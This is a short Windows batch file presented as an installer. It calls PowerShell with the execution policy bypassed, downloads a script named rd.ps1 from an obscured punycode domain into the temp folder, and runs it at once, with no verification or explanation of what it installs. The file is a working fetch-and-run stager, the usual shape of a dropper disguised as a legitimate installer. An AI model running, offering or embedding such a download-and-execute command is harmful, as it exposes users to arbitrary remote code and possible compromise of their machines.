@echo off
chcp 65001 >nul
echo Downloading installer...
powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://xn--39-glcqe5aecpy.xn--p1ai/rd.ps1' -OutFile '%TEMP%\rd_install.ps1' -UseBasicParsing"
echo Running installer...
powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\rd_install.ps1"
pause
